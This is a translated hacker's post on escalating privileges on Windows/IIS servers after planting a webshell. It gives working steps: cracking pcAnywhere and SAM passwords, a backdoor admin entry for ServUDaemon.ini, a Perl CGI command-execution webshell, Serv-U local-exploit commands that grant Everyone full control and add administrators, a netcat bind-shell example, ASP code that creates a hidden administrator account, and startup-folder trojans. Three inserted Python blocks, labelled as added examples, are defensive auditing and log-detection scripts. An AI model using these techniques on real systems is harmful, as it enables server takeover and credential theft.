This article combines the privilege-escalation techniques of many experts with some ideas of my own.
Once we have a webshell, the next step is to escalate privileges.
My personal summary is as follows:
1. C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\
Check whether you can browse to this directory. If you can, download its .CIF file, recover the pcAnywhere password from it, and log on with it.
PS: a cracking tool is available on this site; search for it yourself!
2. c:\winnt\system32\config\
Take the SAM file from here to crack the users' passwords.
Tools for cracking SAM passwords: LC, SAMInside.
3. c:\Documents and Settings\All Users\Start Menu\Programs\
We can get a lot of useful information from here.
It contains many shortcuts. We usually pick the Serv-U shortcut and check its properties; once we know the install path, we check whether the page can browse to it.
Once inside, if you have permission to modify ServUDaemon.ini, add a user with a blank password:
[USER=wekwen|1]
Password=
HomeDir=c:\
TimeOut=600
Maintenance=System
Access1=C:\|RWAMELCDP
Access2=D:\|RWAMELCDP
Access3=f:\|RWAMELCDP
SKEYValues=
This user has the highest permissions; we can then log on over FTP and use quote site exec xxx to escalate privileges.
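As an added example (not part of the original post, and not Serv-U's own code), here is a Python audit for a ServUDaemon.ini that flags the account pattern just shown from the defender's side: a blank password, Maintenance=System, and write or execute access on a drive root. The ini text is constructed for the example; reading the access letters W and E as write and execute is an assumption about Serv-U's flag set.

```python
import re

# Constructed ServUDaemon.ini fragment for this example (not from any real
# server): one ordinary account, plus the blank-password, Maintenance=System
# account pattern described in the post.
SAMPLE_INI = """\
[GLOBAL]
Version=5.2.0.1

[USER=ftpuser|1]
Password=ckExampleHashPlaceholderNotReal
HomeDir=D:\\ftproot
Maintenance=None
Access1=D:\\ftproot|RL

[USER=wekwen|1]
Password=
HomeDir=c:\\
TimeOut=600
Maintenance=System
Access1=C:\\|RWAMELCDP
Access2=D:\\|RWAMELCDP
Access3=f:\\|RWAMELCDP
SKEYValues=
"""

# Section headers look like [USER=name|1]; spaces around '=' and '|' are tolerated.
USER_HEADER = re.compile(r"^\[\s*USER\s*=\s*([^|\]]+?)\s*(?:\|\s*\d+)?\s*\]$", re.I)
ACCESS_KEY = re.compile(r"^ACCESS\d+$", re.I)
DRIVE_ROOT = re.compile(r"^[A-Za-z]:\\?$")


def parse_servu_users(text):
    """Return {username: {"access": [(path, flags), ...], <key>: value, ...}}."""
    users, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("["):
            m = USER_HEADER.match(line)
            current = m.group(1) if m else None   # non-user sections are skipped
            if current is not None:
                users[current] = {"access": []}
            continue
        if current is None or "=" not in line:
            continue
        key, _, value = line.partition("=")
        key, value = key.strip(), value.strip()
        if ACCESS_KEY.match(key):
            path, _, flags = value.partition("|")
            users[current]["access"].append((path.strip(), flags.strip().upper()))
        else:
            users[current][key.lower()] = value
    return users


def audit_servu_users(users):
    """List (username, reason) findings for risky account settings."""
    findings = []
    for name, cfg in users.items():
        # A missing Password line is treated the same as an empty one.
        if cfg.get("password", "") == "":
            findings.append((name, "blank password"))
        if cfg.get("maintenance", "none").lower() == "system":
            findings.append((name, "Maintenance=System (server administrator)"))
        for path, flags in cfg["access"]:
            # Assumption: W = write and E = execute among Serv-U's access letters.
            if DRIVE_ROOT.match(path) and ("W" in flags or "E" in flags):
                findings.append((name, f"write/execute on drive root {path} ({flags})"))
    return findings


def audit_servu_ini(text):
    return audit_servu_users(parse_servu_users(text))


if __name__ == "__main__":
    for user, reason in audit_servu_ini(SAMPLE_INI):
        print(f"{user}: {reason}")
```

Running the script against the sample prints five findings, all for the wekwen account, and nothing for the ordinary ftpuser account; run it over a real ServUDaemon.ini to spot accounts added this way.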
4. c:\winnt\system32\inetsrv\data\
This directory is also fully controlled by Everyone. All we need to do is upload the escalation tool there and execute it.
5. Check whether you can browse to the following directories:
C:\PHP, use phpspy.
C:\Perl (it is not necessarily this directory; you can also download the shortcut and view its properties to find the path).
#!/usr/bin/perl
# cmd.pl: runs the query string as a command and returns its output as HTML
binmode(STDOUT);
syswrite(STDOUT, "Content-Type: text/html\r\n\r\n");
$_ = $ENV{QUERY_STRING};
s/%20/ /ig;     # decode spaces
s/%2f/\//ig;    # decode slashes
$execthis = $_;
syswrite(STDOUT, "<HTML><PRE>\r\n");
open(STDERR, ">&STDOUT") || die "can't redirect stderr";   # show errors too
system($execthis);
syswrite(STDOUT, "\r\n</PRE></HTML>\r\n");
close(STDERR);
close(STDOUT);
exit;
Save it as a .cgi file and run it.
If that does not work, try the .pl extension: rename the .cgi file to .pl and request http://anyhost/cmd.pl?dir
If "Access Denied" is displayed, the script is being executed! Now upload su.exe (the Serv-U escalation tool) to the Perl bin directory and request:
http://anyhost/cmd.pl?C:\Perl\bin\su.exe
It returns:
Serv-U > 3.x Local Exploit by Xiaolu
Usage: serv-u.exe "command"
Example: serv-u.exe "nc.exe -l -p 99 -e cmd.exe"
This currently runs with IUSR permissions; submit:
http://anyhost/cmd.pl?C:\Perl\bin\su.exe "cacls.exe C: /e /t /g everyone:F"
http://anyhost/cmd.pl?C:\Perl\bin\su.exe "cacls.exe D: /e /t /g everyone:F"
http://anyhost/cmd.pl?C:\Perl\bin\su.exe "cacls.exe E: /e /t /g everyone:F"
http://anyhost/cmd.pl?C:\Perl\bin\su.exe "cacls.exe F: /e /t /g everyone:F"
If the following output is returned, the operation succeeded:
Serv-U > 3.x Local Exploit by Xiaolu
< 220 Serv-U FTP Server v5.2 for WinSock ready...
> USER localadministrator
< 331 User name okay, need password.
******************************************************
> PASS #l@$AK#.lk;0@P
< 230 User logged in, proceed.
******************************************************
> SITE MAINTENANCE
******************************************************
[+] Creating new domain...
< 200-DomainID=2
< 220 Domain settings saved
******************************************************
[+] Domain XL:2 created
[+] Creating edevil user
< 200-User=XL
< 200 User settings saved
******************************************************
[+] Now exploiting...
> USER XL
< 331 User name okay, need password.
******************************************************
> PASS 111111
< 230 User logged in, proceed.
******************************************************
[+] Now executing: cacls.exe C: /e /t /g everyone:F
< 220 Domain deleted
All partitions are now fully controlled by Everyone.
Next, add our user to the Administrators group:
http://anyhost/cmd.pl?C:\Perl\bin\su.exe "net localgroup administrators iusr_anyhost /add"
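The requests above leave a distinctive trace in the web server's logs. As an added example (not part of the original post), here is a Python detector that reads IIS W3C extended log lines and flags requests to script files whose query string looks like a command: an executable path, a cacls call, a net localgroup call, or a bare shell built-in. The log excerpt, client addresses and field list are constructed for the example; the indicator list is a starting set, not IIS's or anyone's official signature.

```python
import re
from urllib.parse import unquote_plus

# Constructed IIS W3C extended log excerpt (not from a real server). The last
# three lines mirror the cmd.pl request pattern described in the post.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 5.0
#Version: 1.0
#Date: 2004-12-12 01:00:00
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2004-12-12 01:00:05 10.0.0.8 GET /index.asp - 200
2004-12-12 01:00:09 10.0.0.8 GET /search.asp q=serv-u 200
2004-12-12 01:01:10 10.0.0.9 GET /cmd.pl dir 200
2004-12-12 01:01:41 10.0.0.9 GET /cmd.pl C:\\Perl\\bin\\su.exe+%22cacls.exe+C:+/e+/t+/g+everyone:F%22 200
2004-12-12 01:02:03 10.0.0.9 GET /cmd.pl C:\\Perl\\bin\\su.exe+%22net+localgroup+administrators+iusr_anyhost+/add%22 200
"""

# Script extensions whose query string should never look like a shell command.
SCRIPT_EXT = (".pl", ".cgi", ".php", ".asp")

# Starting set of indicators; tune to the site (a search form may legitimately
# receive "dir" as a word, for instance).
INDICATORS = [
    ("executable path in query", re.compile(r"\.exe\b", re.I)),
    ("ACL change (cacls)", re.compile(r"\bcacls(\.exe)?\b", re.I)),
    ("group membership change", re.compile(r"\bnet\s+localgroup\b", re.I)),
    ("bare shell command", re.compile(r"^(dir|cmd|type|copy|del)\b", re.I)),
]


def parse_w3c_log(text):
    """Yield one dict per request line, keyed by the names in the #Fields header."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line[len("#Fields:"):].split()
            continue
        if not line or line.startswith("#") or fields is None:
            continue
        parts = line.split(" ")
        if len(parts) == len(fields):      # skip truncated or malformed lines
            yield dict(zip(fields, parts))


def flag_cgi_command_requests(text):
    """Return flagged requests as (client ip, uri stem, decoded query, indicator labels)."""
    hits = []
    for rec in parse_w3c_log(text):
        stem = rec.get("cs-uri-stem", "")
        if not stem.lower().endswith(SCRIPT_EXT):
            continue
        # IIS logs the query as sent; decode %xx and '+' before matching.
        query = unquote_plus(rec.get("cs-uri-query", ""))
        labels = [label for label, rx in INDICATORS if rx.search(query)]
        if labels:
            hits.append((rec.get("c-ip", "?"), stem, query, labels))
    return hits


if __name__ == "__main__":
    for ip, stem, query, labels in flag_cgi_command_requests(SAMPLE_LOG):
        print(f"{ip} {stem} {labels}: {query}")
```

On the sample, the two ordinary .asp requests pass and the three cmd.pl requests are flagged, the last two with two indicators each; feeding it the server's own daily log files is the obvious next step.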
6. You can also escalate with adsutil.vbs. Run
cscript C:\Inetpub\adminscripts\adsutil.vbs get w3svc/inprocessisapiapps
to list the ISAPI DLLs that run in-process (with the web server's own privileges): idq.dll httpext.dll httpodbc.dll ssinc.dll msw3prt.dll
Adding asp.dll to this list makes ASP pages run in-process as that privileged user.
asp.dll is stored at c:\winnt\system32\inetsrv\asp.dll (the location may differ from machine to machine).
Now set the list:
cscript adsutil.vbs set /w3svc/inprocessisapiapps "C:\winnt\system32\idq.dll" "C:\winnt\system32\inetsrv\httpext.dll" "C:\winnt\system32\inetsrv\httpodbc.dll" "C:\winnt\system32\inetsrv\ssinc.dll" "C:\winnt\system32\msw3prt.dll" "C:\winnt\system32\inetsrv\asp.dll"
Then run cscript adsutil.vbs get /w3svc/inprocessisapiapps to check that asp.dll was added.
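The same get command is the defender's check: anything in InProcessIsapiApps beyond the stock set listed above deserves an explanation. As an added example (not part of the original post, and not an IIS tool), here is a Python baseline comparison that extracts the .dll names from the command's output and reports the extras. The sample output block is constructed, and its exact layout is an assumption about how adsutil.vbs prints a list; the parser therefore accepts both quoted full paths and the bare space-separated names used in the post.

```python
import re

# The in-process ISAPI DLLs the post lists as the stock IIS 5 set; anything
# else (asp.dll in the post's example) is reported as a deviation.
BASELINE_INPROCESS = {"idq.dll", "httpext.dll", "httpodbc.dll", "ssinc.dll", "msw3prt.dll"}

# Constructed sample of `cscript adsutil.vbs get w3svc/InProcessIsapiApps`
# output after asp.dll has been added (the output layout is an assumption).
SAMPLE_OUTPUT = """\
InProcessIsapiApps              : (LIST) (6 Items)
  "C:\\WINNT\\System32\\idq.dll"
  "C:\\WINNT\\System32\\inetsrv\\httpext.dll"
  "C:\\WINNT\\System32\\inetsrv\\httpodbc.dll"
  "C:\\WINNT\\System32\\inetsrv\\ssinc.dll"
  "C:\\WINNT\\System32\\msw3prt.dll"
  "C:\\WINNT\\System32\\inetsrv\\asp.dll"
"""

# Either a full drive path ending in .dll, or a bare name such as idq.dll.
DLL_REF = re.compile(r'[A-Za-z]:\\[^"\s]+\.dll|\b[\w.]+\.dll\b', re.I)


def extract_dll_basenames(output):
    """Return the lowercase file names of every .dll mentioned in the text."""
    paths = DLL_REF.findall(output)
    return {p.replace("/", "\\").split("\\")[-1].lower() for p in paths}


def unexpected_inprocess_dlls(output, baseline=BASELINE_INPROCESS):
    """Sorted list of in-process DLLs that are not in the known-good baseline."""
    return sorted(extract_dll_basenames(output) - baseline)


if __name__ == "__main__":
    extras = unexpected_inprocess_dlls(SAMPLE_OUTPUT)
    print("unexpected in-process ISAPI DLLs:", extras or "none")
```

The check compares file names only, so a DLL that was replaced in place would not show up; pair it with a hash or signature check of the listed files where that matters.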
7. You can also try this code to escalate (it creates an account and adds it to Administrators through the WinNT ADSI provider); the effect seems limited.
<%@ CodePage=936 %>
<% Response.Expires = 0
On Error Resume Next
Session.Timeout = 50
Server.ScriptTimeout = 3000
Set lp = Server.CreateObject("WScript.Network")
oz = "WinNT://" & lp.ComputerName
Set ob = GetObject(oz)
Set oe = GetObject(oz & "/Administrators,group")
Set od = ob.Create("user", "wekwen$")
od.SetPassword "wekwen"   ' <----- password
od.SetInfo
Set of = GetObject(oz & "/wekwen$,user")
oe.Add(of.ADsPath)
Response.Write "wekwen$ super account created successfully!" %>
Use this code to check whether it succeeded:
<%@ CodePage=936 %>
<% Response.Expires = 0
On Error Resume Next   ' list the accounts in the Administrators group
Set tn = Server.CreateObject("WScript.Network")
Set objGroup = GetObject("WinNT://" & tn.ComputerName & "/Administrators,group")
For Each admin In objGroup.Members
    Response.Write admin.Name & "<br>"
Next
If Err Then
    Response.Write "No: WScript.Network"
End If
%>
8. c:\Program Files\Java Web Start\
If you can reach it, try a JSP webshell. I heard that its permissions are very low, and I have never come across it myself.
9. Finally, if the host is configured unusually, try writing a .bat, .vbs or other trojan into C:\Documents and Settings\All Users\Start Menu\Programs\Startup.
Then wait for the host to be restarted (or force a restart with DDoS) to gain privileges.
To sum up: find a directory that is writable and executable, take control of it, upload the escalation tool, and finally run the command. In three words: find, upload, execute.
The above are my notes. Do you have any good methods to share?
Xiaohui
04.12.12